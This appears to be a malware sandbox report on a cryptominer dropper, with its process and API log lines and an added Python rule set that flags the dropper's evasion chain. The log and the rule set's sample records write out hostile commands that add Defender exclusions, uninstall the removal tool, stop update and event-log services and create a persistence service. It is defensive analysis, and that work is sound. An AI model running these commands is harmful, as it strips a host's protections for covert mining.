        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
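        The process-creation lines above are the whole defense-evasion and persistence chain of this sample, run once by the dropper and again by the service copy: Windows Defender exclusions for the user profile, ProgramData and every .exe; removal of KB890830 (the Malicious Software Removal Tool) via wusa; stopping the Windows Update stack (UsoSvc, WaaSMedicSvc, wuauserv, BITS, DoSvc) so the removed tool and signatures are not restored; powercfg timeouts of 0 so the host never sleeps while mining; stopping the EventLog service; and a service named CKTJZLMO whose binpath is under ProgramData. Any single one of these commands is ordinary admin noise; the chain from one parent is not. The detection logic below is an added example written for this report, not part of Joe Sandbox or of the sample. It runs over constructed Sysmon-style process-creation records (parent image, image, command line) modelled on the lines above, groups rule hits by parent process and raises a verdict only when a parent chains several distinct techniques. The service name, paths and threshold are taken from or chosen for this report and are not a general signature.

```python
import re
from collections import defaultdict

# Rules for the evasion/persistence chain listed above; each regex runs
# case-insensitively over the full command line of a process-creation record.
RULES = {
    "defender_exclusion":    re.compile(r"add-mppreference\b.*-exclusion(path|extension|process)", re.I),
    "msrt_uninstall":        re.compile(r"\bwusa(\.exe)?\s+/uninstall\s+/kb:890830\b", re.I),
    "update_service_stop":   re.compile(r"\bsc(\.exe)?\s+stop\s+(usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b", re.I),
    "power_timeout_zero":    re.compile(r"\bpowercfg(\.exe)?\s+[/-]x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I),
    "eventlog_stop":         re.compile(r"\bsc(\.exe)?\s+stop\s+eventlog\b", re.I),
    "service_user_writable": re.compile(
        r'\bsc(\.exe)?\s+create\b.*\bbinpath=\s*"?[a-z]:\\(programdata|users|windows\\temp)\\', re.I),
}

# Signed system binaries this sample launches as injection hosts. A launch from
# a parent outside %SystemRoot% is worth flagging even without a command line.
HOST_BINARIES = {"dialer.exe"}


def classify(parent_image, image, cmdline):
    """Rule names triggered by one process-creation record."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    if image.rsplit("\\", 1)[-1].lower() in HOST_BINARIES and "\\windows\\" not in parent_image.lower():
        hits.add("host_binary_from_untrusted_parent")
    return hits


def analyze(records):
    """Union the rule hits of all children under the parent that issued them."""
    by_parent = defaultdict(set)
    for rec in records:
        by_parent[rec["parent_image"]] |= classify(rec["parent_image"], rec["image"], rec["cmdline"])
    return dict(by_parent)


def verdict(records, min_techniques=3):
    """Parents that chained at least min_techniques distinct techniques.
    One 'sc stop' or powercfg call is admin noise; several from one parent is the chain."""
    return sorted(p for p, hits in analyze(records).items() if len(hits) >= min_techniques)


# Constructed Sysmon-style (event ID 1) records modelled on the process tree above.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"},
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"},
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"},
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe", "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"'},
    {"parent_image": r"C:\Users\user\Desktop\xmr new.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"C:\Windows\system32\sc.exe stop eventlog"},
    {"parent_image": r"C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe", "image": r"C:\Windows\System32\dialer.exe",
     "cmdline": r"C:\Windows\system32\dialer.exe"},
    # Benign admin activity that must not trip the verdict (constructed).
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc.exe stop Spooler"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"powercfg.exe /list"},
]

if __name__ == "__main__":
    for parent, hits in analyze(SAMPLE_EVENTS).items():
        print(f"{parent}: {sorted(hits)}")
    print("verdict:", verdict(SAMPLE_EVENTS))
```

        In production the records come from Sysmon event 1 or Security event 4688 with command-line auditing enabled; the grouping key should be the parent process GUID rather than the image path, since the same image can be a benign parent elsewhere.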
        Source: C:\Users\user\Desktop\xmr new.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: xmr new.exe Static PE information: Image base 0x140000000 > 0x60000000
        Source: xmr new.exe Static file information: File size 5471744 > 1048576
        Source: xmr new.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x52a800
        Source: xmr new.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\dialer.exe Code function: 66_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect 66_2_00000001408460F0
        Source: xmr new.exe Static PE information: section name: .00cfg
        Source: eejhedztifcv.exe.0.dr Static PE information: section name: .00cfg
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BAACDD push rcx; retf 003Fh 31_2_000001F385BAACDE
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BDC6DD push rcx; retf 003Fh 31_2_000001F385BDC6DE
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385C0ACDD push rcx; retf 003Fh 31_2_000001F385C0ACDE
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2911DACDD push rcx; retf 003Fh 37_2_000002A2911DACDE
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2919AC6DD push rcx; retf 003Fh 37_2_000002A2919AC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255EACDD push rcx; retf 003Fh 40_2_0000014E255EACDE
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EEC6DD push rcx; retf 003Fh 40_2_0000014E25EEC6DE
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F3ACDD push rcx; retf 003Fh 42_2_00000283E0F3ACDE
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F6C6DD push rcx; retf 003Fh 42_2_00000283E0F6C6DE
        Source: C:\Windows\System32\dialer.exe Code function: 65_2_0000000140001394 push qword ptr [0000000140009004h]; ret 65_2_0000000140001403
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539AACDD push rcx; retf 003Fh 67_2_000001FB539AACDE
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539DC6DD push rcx; retf 003Fh 67_2_000001FB539DC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BBACDD push rcx; retf 003Fh 68_2_000001CBD8BBACDE
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BEC6DD push rcx; retf 003Fh 68_2_000001CBD8BEC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD14ACDD push rcx; retf 003Fh 69_2_000001F2BD14ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD17C6DD push rcx; retf 003Fh 69_2_000001F2BD17C6DE

        Persistence and Installation Behavior

        Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe File created: C:\Windows\TEMP\zhgmaxoaawxc.sys
        Source: C:\Users\user\Desktop\xmr new.exe File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe File created: C:\Windows\Temp\zhgmaxoaawxc.sys
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

        Hooking and other Techniques for Hiding and Protection

        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 25_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 63_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exe System information queried: FirmwareTableInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4599
